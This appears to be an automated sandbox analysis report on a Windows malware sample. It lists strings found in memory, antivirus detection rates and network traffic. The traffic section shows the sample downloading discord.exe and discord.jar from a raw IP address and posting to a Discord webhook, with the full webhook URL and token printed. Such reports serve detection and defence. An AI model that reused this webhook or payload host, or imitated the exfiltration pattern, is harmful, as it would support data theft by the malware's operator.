Source: S3zoj9Uts0.exe, 00000000.00000003.324638231.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.324656060.0000000006345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.wikipedia.Xs
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
Source: javaw.exe, 00000001.00000002.581342306.000000000A1E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.330568385.0000000015D12000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.588080129.0000000015D21000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.364579973.00000000158C0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.364983883.00000000158C0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.365248645.00000000158E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com
Source: javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.0000000004DFE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.00000000049FB000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.comS
Source: javaw.exe, 00000005.00000002.577426840.00000000049FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.coms
Source: javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
Source: javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
Source: javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/K
Source: S3zoj9Uts0.exe, 00000000.00000002.577854090.000000000249B000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000004.00000002.577897163.000000000240F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: javaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl
Source: javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.324656060.0000000006345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: S3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: S3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html7
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl
Source: javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crlk3G
Source: javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl
Source: javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: javaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org
Source: javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.328505769.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329922047.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329863635.0000000006342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
Source: S3zoj9Uts0.exe, 00000000.00000003.328716911.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.333786625.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.333770966.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.333800108.0000000006342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers#
Source: S3zoj9Uts0.exe, 00000000.00000003.329077151.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329430980.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.328458739.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329387204.0000000006344000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329138910.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329476092.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329158852.0000000006344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
Source: S3zoj9Uts0.exe, 00000000.00000003.328458739.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.328479178.0000000006344000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.328505769.0000000006342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/1
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: S3zoj9Uts0.exe, 00000000.00000003.329046284.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329015805.0000000006342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: S3zoj9Uts0.exe, 00000000.00000003.329046284.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
Source: S3zoj9Uts0.exe, 00000000.00000003.329600210.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329693162.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329650204.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329628497.0000000006342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers:
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
Source: S3zoj9Uts0.exe, 00000000.00000003.329809041.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.328505769.0000000006342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersT
Source: S3zoj9Uts0.exe, 00000000.00000003.329600210.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.329628497.0000000006342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersw
Source: S3zoj9Uts0.exe, 00000000.00000003.333786625.0000000006342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersx
Source: S3zoj9Uts0.exe, 00000000.00000002.582451232.0000000006310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comce
Source: S3zoj9Uts0.exe, 00000000.00000002.582451232.0000000006310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.come.com
Source: S3zoj9Uts0.exe, 00000000.00000002.582451232.0000000006310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comod
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.324091059.0000000006323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: S3zoj9Uts0.exe, 00000000.00000003.324091059.0000000006323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn2
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.
Source: S3zoj9Uts0.exe, 00000000.00000003.325729196.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/8
Source: S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/C
Source: S3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/J
Source: S3zoj9Uts0.exe, 00000000.00000003.325729196.0000000006314000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/X
Source: S3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
Source: S3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/d
Source: S3zoj9Uts0.exe, 00000000.00000003.325729196.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/h
Source: S3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: S3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/.
Source: S3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/C
Source: S3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/X
Source: S3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/o
Source: javaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm
Source: javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
Source: javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
Source: S3zoj9Uts0.exe, 00000000.00000003.327421985.0000000006349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comd
Source: S3zoj9Uts0.exe, 00000000.00000003.327421985.0000000006349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comin
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
Source: S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
Source: S3zoj9Uts0.exe, 00000000.00000003.324712938.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: S3zoj9Uts0.exe, 00000000.00000003.324712938.0000000006342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn7r#
Source: S3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024BE000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000004.00000002.577897163.000000000240F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canary.discord.com
Source: S3zoj9Uts0.exe, 00000000.00000000.309170814.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, S3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024BE000.00000004.00000800.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000002.577854090.0000000002441000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000004.00000002.577897163.00000000023BA000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000004.00000002.577897163.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canary.discord.com/api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwX
Source: S3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024BE000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000004.00000002.577897163.000000000240F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canary.discord.com4
Source: javaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com
Source: javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: unknownHTTP traffic detected: POST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1Content-Type: application/jsonHost: canary.discord.comContent-Length: 62Expect: 100-continueConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: canary.discord.com
Source: global trafficHTTP traffic detected: GET /discord.exe HTTP/1.1Host: 23.94.99.119Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /discord.jar HTTP/1.1Host: 23.94.99.119
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.4:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49701 version: TLS 1.2
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeCode function: 0_2_0230CDD40_2_0230CDD4
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeCode function: 0_2_0230F3D00_2_0230F3D0
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeCode function: 0_2_0230F3C00_2_0230F3C0
Source: S3zoj9Uts0.exe, 00000000.00000002.577854090.0000000002525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsftEdit.DLL.MUIj% vs S3zoj9Uts0.exe
Source: S3zoj9Uts0.exe, 00000000.00000002.577854090.0000000002525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs S3zoj9Uts0.exe
Source: S3zoj9Uts0.exe, 00000000.00000002.577854090.0000000002525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs S3zoj9Uts0.exe
Source: S3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamediscord.exe* vs S3zoj9Uts0.exe
Source: S3zoj9Uts0.exe, 00000000.00000000.309179923.00000000001DA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamediscord.exe* vs S3zoj9Uts0.exe
Source: S3zoj9Uts0.exeReversingLabs: Detection: 28%
Source: S3zoj9Uts0.exeVirustotal: Detection: 31%
Source: S3zoj9Uts0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
